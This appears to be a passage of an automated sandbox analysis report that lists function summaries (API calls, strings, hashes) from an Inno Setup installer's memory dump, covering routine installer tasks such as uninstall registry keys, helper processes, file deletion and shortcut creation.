                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 770386003-3271284199
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 70e38dd447138bcefc713db898d614ae7d4513f4e48320b4567d3bd45fcb569e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 46381a2ef6f5f7687f8d932114089cfc0a3b3023078b53c1614b04e084b280c9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70e38dd447138bcefc713db898d614ae7d4513f4e48320b4567d3bd45fcb569e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02711370A04348AEDB11DB69CC41B5EBBF8EB15705F1084BAB944FB282DB7859488B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041CA1C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                                                                                                                                                                                                                                                                                                  • 73EA6180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                                                                                                                                                                                                                                                                                                  • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                                                                                                                                                                                                                                                                                                  • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Color$ObjectSelect$E922E98830Text$A570A6180DeleteFillRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1952589944-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004502AC Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 45libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32(00480618), ref: 004502BF
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480618), ref: 004502D7
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmStartSession), ref: 004502F5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmRegisterResources), ref: 0045030A
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmGetList), ref: 0045031F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmShutdown), ref: 00450334
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmRestart), ref: 00450349
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmEndSession), ref: 0045035E
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1968650500-3419246398
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7cc48a0367f981266fd0da5a480c29d0f3082de0c95511ddd32f2e75d41d9e32
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1cbd638475316f18669290cc5db137bdc69b0bbe350ace6e5bf0246856dda450
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cc48a0367f981266fd0da5a480c29d0f3082de0c95511ddd32f2e75d41d9e32
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC11A5B4541740DBDA10FBA5BB85A2A32E9E72C715B08563BEC44AA1A2DB7C4448CF9C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004690F4 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,0046930E,?,?,00000001,00000000,00000000,00469329,?,00000000,00000000,?), ref: 004692F7
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: User Info: Name, xrefs: 004692B3
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Icon Group, xrefs: 004691D2
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Selected Tasks, xrefs: 00469263
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: No Icons, xrefs: 004691DF
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00469153
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Deselected Tasks, xrefs: 00469285
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Deselected Components, xrefs: 00469238
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: User Info: Organization, xrefs: 004692C6
                                                                                                                                                                                                                                                                                                                                                                  • %s\%s_is1, xrefs: 00469171
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: App Path, xrefs: 004691B6
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: User Info: Serial, xrefs: 004692D9
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Setup Type, xrefs: 00469206
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Selected Components, xrefs: 00469216
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-1093091907
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 39aaf2710b8dcc9925ef1b8acf94251e60f4389a4c1716d00ca03a8503c3ae03
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 061cd232f3236ea8aa9d1be5d6e88d15b117e94232a8cb9589ebe07a9024ca8b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39aaf2710b8dcc9925ef1b8acf94251e60f4389a4c1716d00ca03a8503c3ae03
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2451A530A007049BCB11DB65D991BDEB7F9EF49304F5084BAE841A7391E778AE05CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00497DA0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000,004984F9,?,00000000), ref: 00497E23
                                                                                                                                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000), ref: 00497E36
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000), ref: 00497E46
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00497E67
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000), ref: 00497E77
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2000705611-3672972446
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4a318e87720889a097493a0abe27b1df8a88164eaf2040f35688be5a9dc9248a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d71e95358f961f9c8085103628ed7ebfe7aaf39cab9d6a0a027eda6f41515cae
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a318e87720889a097493a0abe27b1df8a88164eaf2040f35688be5a9dc9248a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C291B530A042449FDF11EBA9DC52BAE7FA4EF4A304F51447BF500AB292DA7DAC05CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0045AA3C Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0045ACF8,?,?,?,?,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045ABAA
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-3112430753
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8dd09e15f559fd6f0d67e26a119f6220e90e0bd9f89cbcf696879c9df5090d41
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f5e388fb48f96f1c0466849e1c52bdf0d536658550fb6e74c3a20cf80cd44526
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dd09e15f559fd6f0d67e26a119f6220e90e0bd9f89cbcf696879c9df5090d41
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2271AE707002445BDB01EB69D8427AE77A6AF48316F50856BFC01DB383CA7C9A5DC79A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0045CF24 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 0045CF3E
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CF5E
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CF6B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CF78
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CF86
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0045CE2C: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CECB,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CEA5
                                                                                                                                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D03F
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D048
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 59345061-4263478283
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2037b2949033d7132acb2327bd8fd217b085bf91818b95555bc32f42a47d3e2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4ce31bb81caf279f5ed3d10c62bb09a2aad5f6c7ba3f26a8019cd68bbbdcec0a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2037b2949033d7132acb2327bd8fd217b085bf91818b95555bc32f42a47d3e2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E95193B1D00608EFDB10DFA9C845BAEBBB8EF48315F14806AF915B7381C2389945CF69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00456550 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 7715E550.OLE32(00499A74,00000000,00000001,00499774,?,00000000,0045688D), ref: 00456592
                                                                                                                                                                                                                                                                                                                                                                  • 7715E550.OLE32(00499764,00000000,00000001,00499774,?,00000000,0045688D), ref: 004565B8
                                                                                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00456745
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • IPersistFile::Save, xrefs: 00456814
                                                                                                                                                                                                                                                                                                                                                                  • CoCreateInstance, xrefs: 004565C3
                                                                                                                                                                                                                                                                                                                                                                  • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567B6
                                                                                                                                                                                                                                                                                                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566DB
                                                                                                                                                                                                                                                                                                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045677C
                                                                                                                                                                                                                                                                                                                                                                  • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566A7
                                                                                                                                                                                                                                                                                                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045672A
                                                                                                                                                                                                                                                                                                                                                                  • IPropertyStore::Commit, xrefs: 00456795
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
